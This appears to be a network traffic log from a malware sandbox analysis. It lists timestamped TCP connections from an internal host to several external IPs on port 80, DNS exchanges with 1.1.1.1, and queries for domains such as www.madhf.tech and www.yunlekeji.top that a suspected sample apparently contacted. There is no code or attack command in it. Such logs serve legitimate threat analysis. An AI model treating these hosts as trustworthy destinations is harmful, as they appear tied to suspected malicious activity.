Jan 11, 2025 01:40:14.514288902 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.514317989 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:14.514424086 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:14.614778996 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.614798069 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.614813089 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.614825964 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.614840984 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.615044117 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.615067005 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.615081072 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.615089893 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:14.615089893 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:14.615093946 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.615108013 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.615151882 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:14.615151882 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:14.615614891 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.615638971 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.615653038 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.615690947 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.615705013 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.615719080 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.615736961 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:14.615736961 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:14.616354942 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:14.616594076 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.616633892 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.616647005 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.616679907 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.616693974 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.616708040 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.616724014 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:14.616724014 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:14.616749048 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:14.617598057 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.617613077 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.617822886 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:14.703109980 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.703134060 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.703300953 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:14.718902111 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.718920946 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.718936920 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.718950987 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.718965054 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:14.719032049 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.719065905 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.719079971 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.719094038 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.719104052 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:14.719104052 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:14.719439030 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.719470978 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.719485044 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:14.719485998 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.719500065 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.719515085 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.719556093 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:14.719556093 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:14.719949007 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.719984055 CET	80	49972	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:14.720026970 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:14.720026970 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:15.190885067 CET	49972	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:16.210045099 CET	49980	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:16.214972973 CET	80	49980	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:16.215092897 CET	49980	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:16.224611044 CET	49980	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:16.229520082 CET	80	49980	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:17.051168919 CET	80	49980	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:17.051198006 CET	80	49980	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:17.051516056 CET	49980	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:17.056158066 CET	49980	80	192.168.2.5	134.0.14.158
Jan 11, 2025 01:40:17.060957909 CET	80	49980	134.0.14.158	192.168.2.5
Jan 11, 2025 01:40:22.523077011 CET	49981	80	192.168.2.5	103.224.182.242
Jan 11, 2025 01:40:22.527944088 CET	80	49981	103.224.182.242	192.168.2.5
Jan 11, 2025 01:40:22.528079033 CET	49981	80	192.168.2.5	103.224.182.242
Jan 11, 2025 01:40:22.543145895 CET	49981	80	192.168.2.5	103.224.182.242
Jan 11, 2025 01:40:22.547967911 CET	80	49981	103.224.182.242	192.168.2.5
Jan 11, 2025 01:40:23.160283089 CET	80	49981	103.224.182.242	192.168.2.5
Jan 11, 2025 01:40:23.160391092 CET	80	49981	103.224.182.242	192.168.2.5
Jan 11, 2025 01:40:23.160612106 CET	49981	80	192.168.2.5	103.224.182.242
Jan 11, 2025 01:40:24.050271988 CET	49981	80	192.168.2.5	103.224.182.242
Jan 11, 2025 01:40:25.069036961 CET	49982	80	192.168.2.5	103.224.182.242
Jan 11, 2025 01:40:25.074013948 CET	80	49982	103.224.182.242	192.168.2.5
Jan 11, 2025 01:40:25.074361086 CET	49982	80	192.168.2.5	103.224.182.242
Jan 11, 2025 01:40:25.088967085 CET	49982	80	192.168.2.5	103.224.182.242
Jan 11, 2025 01:40:25.093801022 CET	80	49982	103.224.182.242	192.168.2.5
Jan 11, 2025 01:40:25.706581116 CET	80	49982	103.224.182.242	192.168.2.5
Jan 11, 2025 01:40:25.706823111 CET	80	49982	103.224.182.242	192.168.2.5
Jan 11, 2025 01:40:25.706983089 CET	49982	80	192.168.2.5	103.224.182.242
Jan 11, 2025 01:40:26.597135067 CET	49982	80	192.168.2.5	103.224.182.242
Jan 11, 2025 01:40:27.634959936 CET	49983	80	192.168.2.5	103.224.182.242
Jan 11, 2025 01:40:27.639852047 CET	80	49983	103.224.182.242	192.168.2.5
Jan 11, 2025 01:40:27.639923096 CET	49983	80	192.168.2.5	103.224.182.242
Jan 11, 2025 01:40:27.690835953 CET	49983	80	192.168.2.5	103.224.182.242
Jan 11, 2025 01:40:27.695764065 CET	80	49983	103.224.182.242	192.168.2.5
Jan 11, 2025 01:40:27.695842981 CET	80	49983	103.224.182.242	192.168.2.5
Jan 11, 2025 01:40:28.282422066 CET	80	49983	103.224.182.242	192.168.2.5
Jan 11, 2025 01:40:28.282605886 CET	80	49983	103.224.182.242	192.168.2.5
Jan 11, 2025 01:40:28.282666922 CET	49983	80	192.168.2.5	103.224.182.242
Jan 11, 2025 01:40:29.206482887 CET	49983	80	192.168.2.5	103.224.182.242
Jan 11, 2025 01:40:30.319403887 CET	49984	80	192.168.2.5	103.224.182.242
Jan 11, 2025 01:40:30.324321032 CET	80	49984	103.224.182.242	192.168.2.5
Jan 11, 2025 01:40:30.324420929 CET	49984	80	192.168.2.5	103.224.182.242
Jan 11, 2025 01:40:30.335510969 CET	49984	80	192.168.2.5	103.224.182.242
Jan 11, 2025 01:40:30.340413094 CET	80	49984	103.224.182.242	192.168.2.5
Jan 11, 2025 01:40:30.942756891 CET	80	49984	103.224.182.242	192.168.2.5
Jan 11, 2025 01:40:30.942800999 CET	80	49984	103.224.182.242	192.168.2.5
Jan 11, 2025 01:40:30.942836046 CET	80	49984	103.224.182.242	192.168.2.5
Jan 11, 2025 01:40:30.942919016 CET	49984	80	192.168.2.5	103.224.182.242
Jan 11, 2025 01:40:30.942941904 CET	49984	80	192.168.2.5	103.224.182.242
Jan 11, 2025 01:40:30.949203014 CET	49984	80	192.168.2.5	103.224.182.242
Jan 11, 2025 01:40:30.954119921 CET	80	49984	103.224.182.242	192.168.2.5
Jan 11, 2025 01:40:36.081255913 CET	49986	80	192.168.2.5	185.27.134.206
Jan 11, 2025 01:40:36.086194038 CET	80	49986	185.27.134.206	192.168.2.5
Jan 11, 2025 01:40:36.086280107 CET	49986	80	192.168.2.5	185.27.134.206
Jan 11, 2025 01:40:36.101294041 CET	49986	80	192.168.2.5	185.27.134.206
Jan 11, 2025 01:40:36.107263088 CET	80	49986	185.27.134.206	192.168.2.5
Jan 11, 2025 01:40:36.707600117 CET	80	49986	185.27.134.206	192.168.2.5
Jan 11, 2025 01:40:36.707652092 CET	80	49986	185.27.134.206	192.168.2.5
Jan 11, 2025 01:40:36.707712889 CET	49986	80	192.168.2.5	185.27.134.206
Jan 11, 2025 01:40:37.612787962 CET	49986	80	192.168.2.5	185.27.134.206
Jan 11, 2025 01:40:38.632008076 CET	49987	80	192.168.2.5	185.27.134.206
Jan 11, 2025 01:40:38.636989117 CET	80	49987	185.27.134.206	192.168.2.5
Jan 11, 2025 01:40:38.637106895 CET	49987	80	192.168.2.5	185.27.134.206
Jan 11, 2025 01:40:38.651045084 CET	49987	80	192.168.2.5	185.27.134.206
Jan 11, 2025 01:40:38.655929089 CET	80	49987	185.27.134.206	192.168.2.5
Jan 11, 2025 01:40:39.254297972 CET	80	49987	185.27.134.206	192.168.2.5
Jan 11, 2025 01:40:39.254354954 CET	80	49987	185.27.134.206	192.168.2.5
Jan 11, 2025 01:40:39.254585028 CET	49987	80	192.168.2.5	185.27.134.206
Jan 11, 2025 01:40:40.159678936 CET	49987	80	192.168.2.5	185.27.134.206
Jan 11, 2025 01:40:41.178842068 CET	49988	80	192.168.2.5	185.27.134.206
Jan 11, 2025 01:40:41.183831930 CET	80	49988	185.27.134.206	192.168.2.5
Jan 11, 2025 01:40:41.184000969 CET	49988	80	192.168.2.5	185.27.134.206
Jan 11, 2025 01:40:41.198714018 CET	49988	80	192.168.2.5	185.27.134.206
Jan 11, 2025 01:40:41.203711987 CET	80	49988	185.27.134.206	192.168.2.5
Jan 11, 2025 01:40:41.203823090 CET	80	49988	185.27.134.206	192.168.2.5
Jan 11, 2025 01:40:41.791675091 CET	80	49988	185.27.134.206	192.168.2.5
Jan 11, 2025 01:40:41.791768074 CET	80	49988	185.27.134.206	192.168.2.5
Jan 11, 2025 01:40:41.791873932 CET	49988	80	192.168.2.5	185.27.134.206
Jan 11, 2025 01:40:42.706743002 CET	49988	80	192.168.2.5	185.27.134.206
Jan 11, 2025 01:40:43.726598978 CET	49989	80	192.168.2.5	185.27.134.206
Jan 11, 2025 01:40:43.731559038 CET	80	49989	185.27.134.206	192.168.2.5
Jan 11, 2025 01:40:43.731784105 CET	49989	80	192.168.2.5	185.27.134.206
Jan 11, 2025 01:40:43.744018078 CET	49989	80	192.168.2.5	185.27.134.206
Jan 11, 2025 01:40:43.748924017 CET	80	49989	185.27.134.206	192.168.2.5
Jan 11, 2025 01:40:44.442990065 CET	80	49989	185.27.134.206	192.168.2.5
Jan 11, 2025 01:40:44.443028927 CET	80	49989	185.27.134.206	192.168.2.5
Jan 11, 2025 01:40:44.443344116 CET	49989	80	192.168.2.5	185.27.134.206
Jan 11, 2025 01:40:44.473910093 CET	49989	80	192.168.2.5	185.27.134.206
Jan 11, 2025 01:40:44.478835106 CET	80	49989	185.27.134.206	192.168.2.5
Jan 11, 2025 01:40:50.732738018 CET	49990	80	192.168.2.5	165.154.96.210
Jan 11, 2025 01:40:50.737679005 CET	80	49990	165.154.96.210	192.168.2.5
Jan 11, 2025 01:40:50.737772942 CET	49990	80	192.168.2.5	165.154.96.210
Jan 11, 2025 01:40:50.752645016 CET	49990	80	192.168.2.5	165.154.96.210
Jan 11, 2025 01:40:50.757530928 CET	80	49990	165.154.96.210	192.168.2.5
Jan 11, 2025 01:40:51.699592113 CET	80	49990	165.154.96.210	192.168.2.5
Jan 11, 2025 01:40:51.699661016 CET	80	49990	165.154.96.210	192.168.2.5
Jan 11, 2025 01:40:51.699826956 CET	49990	80	192.168.2.5	165.154.96.210
Jan 11, 2025 01:40:51.699884892 CET	80	49990	165.154.96.210	192.168.2.5
Jan 11, 2025 01:40:51.699940920 CET	49990	80	192.168.2.5	165.154.96.210
Jan 11, 2025 01:40:52.269153118 CET	49990	80	192.168.2.5	165.154.96.210
Jan 11, 2025 01:40:53.288316011 CET	49991	80	192.168.2.5	165.154.96.210
Jan 11, 2025 01:40:53.293275118 CET	80	49991	165.154.96.210	192.168.2.5
Jan 11, 2025 01:40:53.293440104 CET	49991	80	192.168.2.5	165.154.96.210
Jan 11, 2025 01:40:53.310786963 CET	49991	80	192.168.2.5	165.154.96.210
Jan 11, 2025 01:40:53.315599918 CET	80	49991	165.154.96.210	192.168.2.5
Jan 11, 2025 01:40:54.241890907 CET	80	49991	165.154.96.210	192.168.2.5
Jan 11, 2025 01:40:54.241940022 CET	80	49991	165.154.96.210	192.168.2.5
Jan 11, 2025 01:40:54.242021084 CET	49991	80	192.168.2.5	165.154.96.210
Jan 11, 2025 01:40:54.242515087 CET	80	49991	165.154.96.210	192.168.2.5
Jan 11, 2025 01:40:54.242592096 CET	49991	80	192.168.2.5	165.154.96.210
Jan 11, 2025 01:40:54.816051960 CET	49991	80	192.168.2.5	165.154.96.210
Jan 11, 2025 01:40:55.834938049 CET	49992	80	192.168.2.5	165.154.96.210
Jan 11, 2025 01:40:55.839874983 CET	80	49992	165.154.96.210	192.168.2.5
Jan 11, 2025 01:40:55.840013981 CET	49992	80	192.168.2.5	165.154.96.210
Jan 11, 2025 01:40:55.854413986 CET	49992	80	192.168.2.5	165.154.96.210
Jan 11, 2025 01:40:55.859380960 CET	80	49992	165.154.96.210	192.168.2.5
Jan 11, 2025 01:40:55.859476089 CET	80	49992	165.154.96.210	192.168.2.5
Jan 11, 2025 01:40:56.783948898 CET	80	49992	165.154.96.210	192.168.2.5
Jan 11, 2025 01:40:56.783994913 CET	80	49992	165.154.96.210	192.168.2.5
Jan 11, 2025 01:40:56.784033060 CET	80	49992	165.154.96.210	192.168.2.5
Jan 11, 2025 01:40:56.784250021 CET	49992	80	192.168.2.5	165.154.96.210
Jan 11, 2025 01:40:56.784250021 CET	49992	80	192.168.2.5	165.154.96.210
Jan 11, 2025 01:40:57.363176107 CET	49992	80	192.168.2.5	165.154.96.210
Jan 11, 2025 01:40:58.382175922 CET	49993	80	192.168.2.5	165.154.96.210
Jan 11, 2025 01:40:58.387264013 CET	80	49993	165.154.96.210	192.168.2.5
Jan 11, 2025 01:40:58.387517929 CET	49993	80	192.168.2.5	165.154.96.210
Jan 11, 2025 01:40:58.396231890 CET	49993	80	192.168.2.5	165.154.96.210
Jan 11, 2025 01:40:58.401103020 CET	80	49993	165.154.96.210	192.168.2.5
Jan 11, 2025 01:40:59.308166981 CET	80	49993	165.154.96.210	192.168.2.5
Jan 11, 2025 01:40:59.308187962 CET	80	49993	165.154.96.210	192.168.2.5
Jan 11, 2025 01:40:59.308203936 CET	80	49993	165.154.96.210	192.168.2.5
Jan 11, 2025 01:40:59.308353901 CET	49993	80	192.168.2.5	165.154.96.210
Jan 11, 2025 01:40:59.311603069 CET	49993	80	192.168.2.5	165.154.96.210
Jan 11, 2025 01:40:59.316461086 CET	80	49993	165.154.96.210	192.168.2.5
Jan 11, 2025 01:41:04.349435091 CET	49994	80	192.168.2.5	45.141.156.114
Jan 11, 2025 01:41:04.354367971 CET	80	49994	45.141.156.114	192.168.2.5
Jan 11, 2025 01:41:04.357517004 CET	49994	80	192.168.2.5	45.141.156.114
Jan 11, 2025 01:41:04.371803045 CET	49994	80	192.168.2.5	45.141.156.114
Jan 11, 2025 01:41:04.376727104 CET	80	49994	45.141.156.114	192.168.2.5
Jan 11, 2025 01:41:05.054543018 CET	80	49994	45.141.156.114	192.168.2.5
Jan 11, 2025 01:41:05.054567099 CET	80	49994	45.141.156.114	192.168.2.5
Jan 11, 2025 01:41:05.054646015 CET	49994	80	192.168.2.5	45.141.156.114
Jan 11, 2025 01:41:05.894686937 CET	49994	80	192.168.2.5	45.141.156.114
Jan 11, 2025 01:41:06.913566113 CET	49995	80	192.168.2.5	45.141.156.114
Jan 11, 2025 01:41:07.686039925 CET	80	49995	45.141.156.114	192.168.2.5
Jan 11, 2025 01:41:07.686300993 CET	49995	80	192.168.2.5	45.141.156.114
Jan 11, 2025 01:41:07.700984001 CET	49995	80	192.168.2.5	45.141.156.114
Jan 11, 2025 01:41:07.705898046 CET	80	49995	45.141.156.114	192.168.2.5
Jan 11, 2025 01:41:08.353347063 CET	80	49995	45.141.156.114	192.168.2.5
Jan 11, 2025 01:41:08.353610039 CET	80	49995	45.141.156.114	192.168.2.5
Jan 11, 2025 01:41:08.353766918 CET	49995	80	192.168.2.5	45.141.156.114
Jan 11, 2025 01:41:09.206530094 CET	49995	80	192.168.2.5	45.141.156.114
Jan 11, 2025 01:41:10.225852966 CET	49996	80	192.168.2.5	45.141.156.114
Jan 11, 2025 01:41:10.230868101 CET	80	49996	45.141.156.114	192.168.2.5
Jan 11, 2025 01:41:10.233438015 CET	49996	80	192.168.2.5	45.141.156.114
Jan 11, 2025 01:41:10.248625040 CET	49996	80	192.168.2.5	45.141.156.114
Jan 11, 2025 01:41:10.253547907 CET	80	49996	45.141.156.114	192.168.2.5
Jan 11, 2025 01:41:10.253896952 CET	80	49996	45.141.156.114	192.168.2.5
Jan 11, 2025 01:41:10.924496889 CET	80	49996	45.141.156.114	192.168.2.5
Jan 11, 2025 01:41:10.924592972 CET	80	49996	45.141.156.114	192.168.2.5
Jan 11, 2025 01:41:10.924832106 CET	49996	80	192.168.2.5	45.141.156.114
Jan 11, 2025 01:41:11.758462906 CET	49996	80	192.168.2.5	45.141.156.114
Jan 11, 2025 01:41:12.773152113 CET	49997	80	192.168.2.5	45.141.156.114
Jan 11, 2025 01:41:12.778126955 CET	80	49997	45.141.156.114	192.168.2.5
Jan 11, 2025 01:41:12.781433105 CET	49997	80	192.168.2.5	45.141.156.114
Jan 11, 2025 01:41:12.794153929 CET	49997	80	192.168.2.5	45.141.156.114
Jan 11, 2025 01:41:12.799050093 CET	80	49997	45.141.156.114	192.168.2.5
Jan 11, 2025 01:41:13.641216993 CET	80	49997	45.141.156.114	192.168.2.5
Jan 11, 2025 01:41:13.641277075 CET	80	49997	45.141.156.114	192.168.2.5
Jan 11, 2025 01:41:13.641402960 CET	49997	80	192.168.2.5	45.141.156.114
Jan 11, 2025 01:41:13.645426989 CET	49997	80	192.168.2.5	45.141.156.114
Jan 11, 2025 01:41:13.650233984 CET	80	49997	45.141.156.114	192.168.2.5
Jan 11, 2025 01:41:19.223220110 CET	49998	80	192.168.2.5	27.124.4.246
Jan 11, 2025 01:41:19.228140116 CET	80	49998	27.124.4.246	192.168.2.5
Jan 11, 2025 01:41:19.228250980 CET	49998	80	192.168.2.5	27.124.4.246
Jan 11, 2025 01:41:19.241024017 CET	49998	80	192.168.2.5	27.124.4.246
Jan 11, 2025 01:41:19.245970011 CET	80	49998	27.124.4.246	192.168.2.5
Jan 11, 2025 01:41:20.034018993 CET	80	49998	27.124.4.246	192.168.2.5
Jan 11, 2025 01:41:20.081417084 CET	49998	80	192.168.2.5	27.124.4.246
Jan 11, 2025 01:41:20.125915051 CET	80	49998	27.124.4.246	192.168.2.5
Jan 11, 2025 01:41:20.125982046 CET	49998	80	192.168.2.5	27.124.4.246
Jan 11, 2025 01:41:20.753437042 CET	49998	80	192.168.2.5	27.124.4.246
Jan 11, 2025 01:41:21.771733999 CET	49999	80	192.168.2.5	27.124.4.246
Jan 11, 2025 01:41:21.776674032 CET	80	49999	27.124.4.246	192.168.2.5
Jan 11, 2025 01:41:21.776767969 CET	49999	80	192.168.2.5	27.124.4.246
Jan 11, 2025 01:41:21.791549921 CET	49999	80	192.168.2.5	27.124.4.246
Jan 11, 2025 01:41:21.796505928 CET	80	49999	27.124.4.246	192.168.2.5
Jan 11, 2025 01:41:22.566281080 CET	80	49999	27.124.4.246	192.168.2.5
Jan 11, 2025 01:41:22.612687111 CET	49999	80	192.168.2.5	27.124.4.246
Jan 11, 2025 01:41:22.659581900 CET	80	49999	27.124.4.246	192.168.2.5
Jan 11, 2025 01:41:22.659688950 CET	49999	80	192.168.2.5	27.124.4.246
Jan 11, 2025 01:41:23.300276041 CET	49999	80	192.168.2.5	27.124.4.246
Jan 11, 2025 01:41:24.320291996 CET	50000	80	192.168.2.5	27.124.4.246
Jan 11, 2025 01:41:24.325153112 CET	80	50000	27.124.4.246	192.168.2.5
Jan 11, 2025 01:41:24.325262070 CET	50000	80	192.168.2.5	27.124.4.246
Jan 11, 2025 01:41:24.346798897 CET	50000	80	192.168.2.5	27.124.4.246
Jan 11, 2025 01:41:24.351639032 CET	80	50000	27.124.4.246	192.168.2.5
Jan 11, 2025 01:41:24.351771116 CET	80	50000	27.124.4.246	192.168.2.5
Jan 11, 2025 01:41:25.126048088 CET	80	50000	27.124.4.246	192.168.2.5
Jan 11, 2025 01:41:25.175349951 CET	50000	80	192.168.2.5	27.124.4.246
Jan 11, 2025 01:41:25.217174053 CET	80	50000	27.124.4.246	192.168.2.5
Jan 11, 2025 01:41:25.217345953 CET	50000	80	192.168.2.5	27.124.4.246
Jan 11, 2025 01:41:25.862828016 CET	50000	80	192.168.2.5	27.124.4.246
Jan 11, 2025 01:41:26.882843971 CET	50001	80	192.168.2.5	27.124.4.246
Jan 11, 2025 01:41:26.887823105 CET	80	50001	27.124.4.246	192.168.2.5
Jan 11, 2025 01:41:26.887989044 CET	50001	80	192.168.2.5	27.124.4.246
Jan 11, 2025 01:41:26.898700953 CET	50001	80	192.168.2.5	27.124.4.246
Jan 11, 2025 01:41:26.903597116 CET	80	50001	27.124.4.246	192.168.2.5
Jan 11, 2025 01:41:27.652823925 CET	80	50001	27.124.4.246	192.168.2.5
Jan 11, 2025 01:41:27.706404924 CET	50001	80	192.168.2.5	27.124.4.246
Jan 11, 2025 01:41:27.741023064 CET	80	50001	27.124.4.246	192.168.2.5
Jan 11, 2025 01:41:27.741170883 CET	50001	80	192.168.2.5	27.124.4.246
Jan 11, 2025 01:41:27.741975069 CET	50001	80	192.168.2.5	27.124.4.246
Jan 11, 2025 01:41:27.746752024 CET	80	50001	27.124.4.246	192.168.2.5
Jan 11, 2025 01:41:32.772695065 CET	50002	80	192.168.2.5	188.114.96.3
Jan 11, 2025 01:41:32.777578115 CET	80	50002	188.114.96.3	192.168.2.5
Jan 11, 2025 01:41:32.777673960 CET	50002	80	192.168.2.5	188.114.96.3
Jan 11, 2025 01:41:32.791568041 CET	50002	80	192.168.2.5	188.114.96.3
Jan 11, 2025 01:41:32.796536922 CET	80	50002	188.114.96.3	192.168.2.5
Jan 11, 2025 01:41:34.301729918 CET	50002	80	192.168.2.5	188.114.96.3
Jan 11, 2025 01:41:34.306956053 CET	80	50002	188.114.96.3	192.168.2.5
Jan 11, 2025 01:41:34.307061911 CET	50002	80	192.168.2.5	188.114.96.3
Jan 11, 2025 01:41:35.318882942 CET	50003	80	192.168.2.5	188.114.96.3
Jan 11, 2025 01:41:35.323939085 CET	80	50003	188.114.96.3	192.168.2.5
Jan 11, 2025 01:41:35.324115038 CET	50003	80	192.168.2.5	188.114.96.3
Jan 11, 2025 01:41:35.338614941 CET	50003	80	192.168.2.5	188.114.96.3
Jan 11, 2025 01:41:35.343564034 CET	80	50003	188.114.96.3	192.168.2.5
Jan 11, 2025 01:41:36.847208977 CET	50003	80	192.168.2.5	188.114.96.3
Jan 11, 2025 01:41:36.853149891 CET	80	50003	188.114.96.3	192.168.2.5
Jan 11, 2025 01:41:36.853255987 CET	50003	80	192.168.2.5	188.114.96.3
Jan 11, 2025 01:41:37.897114038 CET	50004	80	192.168.2.5	188.114.96.3
Jan 11, 2025 01:41:37.902000904 CET	80	50004	188.114.96.3	192.168.2.5
Jan 11, 2025 01:41:37.902110100 CET	50004	80	192.168.2.5	188.114.96.3
Jan 11, 2025 01:41:37.919285059 CET	50004	80	192.168.2.5	188.114.96.3
Jan 11, 2025 01:41:37.924058914 CET	80	50004	188.114.96.3	192.168.2.5
Jan 11, 2025 01:41:37.924206018 CET	80	50004	188.114.96.3	192.168.2.5
Jan 11, 2025 01:41:39.425416946 CET	50004	80	192.168.2.5	188.114.96.3
Jan 11, 2025 01:41:39.430444002 CET	80	50004	188.114.96.3	192.168.2.5
Jan 11, 2025 01:41:39.431514025 CET	50004	80	192.168.2.5	188.114.96.3
Jan 11, 2025 01:41:40.528273106 CET	50005	80	192.168.2.5	188.114.96.3
Jan 11, 2025 01:41:40.533178091 CET	80	50005	188.114.96.3	192.168.2.5
Jan 11, 2025 01:41:40.533289909 CET	50005	80	192.168.2.5	188.114.96.3
Jan 11, 2025 01:41:40.592025042 CET	50005	80	192.168.2.5	188.114.96.3
Jan 11, 2025 01:41:40.597012043 CET	80	50005	188.114.96.3	192.168.2.5
Jan 11, 2025 01:42:19.974260092 CET	80	50005	188.114.96.3	192.168.2.5
Jan 11, 2025 01:42:19.974771976 CET	80	50005	188.114.96.3	192.168.2.5
Jan 11, 2025 01:42:19.974838972 CET	50005	80	192.168.2.5	188.114.96.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 01:39:52.780023098 CET	49444	53	192.168.2.5	1.1.1.1
Jan 11, 2025 01:39:52.798819065 CET	53	49444	1.1.1.1	192.168.2.5
Jan 11, 2025 01:40:08.538233042 CET	64764	53	192.168.2.5	1.1.1.1
Jan 11, 2025 01:40:08.570329905 CET	53	64764	1.1.1.1	192.168.2.5
Jan 11, 2025 01:40:22.070087910 CET	50841	53	192.168.2.5	1.1.1.1
Jan 11, 2025 01:40:22.520380020 CET	53	50841	1.1.1.1	192.168.2.5
Jan 11, 2025 01:40:35.960539103 CET	65002	53	192.168.2.5	1.1.1.1
Jan 11, 2025 01:40:36.078814030 CET	53	65002	1.1.1.1	192.168.2.5
Jan 11, 2025 01:40:49.492259979 CET	50779	53	192.168.2.5	1.1.1.1
Jan 11, 2025 01:40:50.487972975 CET	50779	53	192.168.2.5	1.1.1.1
Jan 11, 2025 01:40:50.730216980 CET	53	50779	1.1.1.1	192.168.2.5
Jan 11, 2025 01:40:50.730252028 CET	53	50779	1.1.1.1	192.168.2.5
Jan 11, 2025 01:41:04.319333076 CET	52490	53	192.168.2.5	1.1.1.1
Jan 11, 2025 01:41:04.346596003 CET	53	52490	1.1.1.1	192.168.2.5
Jan 11, 2025 01:41:18.662542105 CET	61189	53	192.168.2.5	1.1.1.1
Jan 11, 2025 01:41:19.220487118 CET	53	61189	1.1.1.1	192.168.2.5
Jan 11, 2025 01:41:32.758327961 CET	63273	53	192.168.2.5	1.1.1.1
Jan 11, 2025 01:41:32.770313978 CET	53	63273	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 01:39:52.780023098 CET	192.168.2.5	1.1.1.1	0xfe5e	Standard query (0)	www.izmirescortg.xyz	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:40:08.538233042 CET	192.168.2.5	1.1.1.1	0x3850	Standard query (0)	www.aballanet.cat	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:40:22.070087910 CET	192.168.2.5	1.1.1.1	0xaca5	Standard query (0)	www.madhf.tech	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:40:35.960539103 CET	192.168.2.5	1.1.1.1	0xe79a	Standard query (0)	www.canadavinreport.site	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:40:49.492259979 CET	192.168.2.5	1.1.1.1	0x1d2c	Standard query (0)	www.yunlekeji.top	A (IP address)	IN (0x0001)	false
